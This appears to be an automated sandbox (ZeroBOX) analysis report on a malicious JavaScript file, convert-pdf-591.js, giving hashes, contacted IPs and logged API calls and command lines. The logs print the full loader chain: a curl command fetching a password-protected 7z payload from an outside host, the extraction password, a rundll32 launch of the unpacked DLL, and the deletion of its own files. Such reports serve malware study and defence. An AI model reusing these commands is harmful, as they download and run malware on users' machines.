Summary | ZeroBOX

convert-pdf-591.js

Generic Malware UPX Malicious Library Malicious Packer PE File OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 14, 2023, 2:30 p.m. Sept. 14, 2023, 2:32 p.m.
Size 45.0KB
Type ASCII text
MD5 44096c929ae4aa847f13d91311eb84b8
SHA256 f56295432ae84c8b1b48024edae29939ae8d0ff988b97ba77169343d6ada72f3
CRC32 B3D190D6
ssdeep 384:D6sdEZ3d3+3S+dfOMGxKecfBVQjgvlzbzNYCAHNo1mB9yWbWyF7Xv99ndMzktipM:RdEL3fpP+nb1InhBQayb6Q3pu
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
192.185.33.166 Active Moloch
49.12.202.237 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3
192.168.56.101:49169
192.185.33.166:443
None None None
TLS 1.3
192.168.56.101:49173
49.12.202.237:443
None None None

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: C:\Users\test22\AppData\Local\Temp\laboriosam.o
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: Cannot open the file as archive
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
file C:\Users\test22\AppData\Local\Temp\laudantium.u.bat
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
cmdline cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline cmd.exe /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
cmdline "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
file C:\Users\test22\AppData\Local\Temp\sequi.h
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: curl
parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\sequi.h"
filepath: curl
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\laudantium.u", scab /k arbalet875
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
file C:\Users\test22\AppData\Local\Temp\laboriosam.o
file C:\Users\test22\AppData\Local\Temp\sequi.h
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
parent_process wscript.exe martian_process cmd.exe /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process wscript.exe martian_process curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://virtuehost.net/clients/ferndale/node_modules/json-schema-traverse/spec/fixtures/786.7z --output "C:\Users\test22\AppData\Local\Temp\laboriosam.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-591.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process wscript.exe martian_process cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\sequi.h" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\laboriosam.o" > "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i""
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\laudantium.uprovident.i" "laudantium.u"
parent_process wscript.exe martian_process "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\sequi.h"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laboriosam.o"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\laudantium.u", scab /k arbalet875
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\laudantium.u.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\laudantium.u", scab /k arbalet875
file C:\Windows\System32\cmd.exe
file C:\util\curl\curl.exe
file C:\Windows\System32\rundll32.exe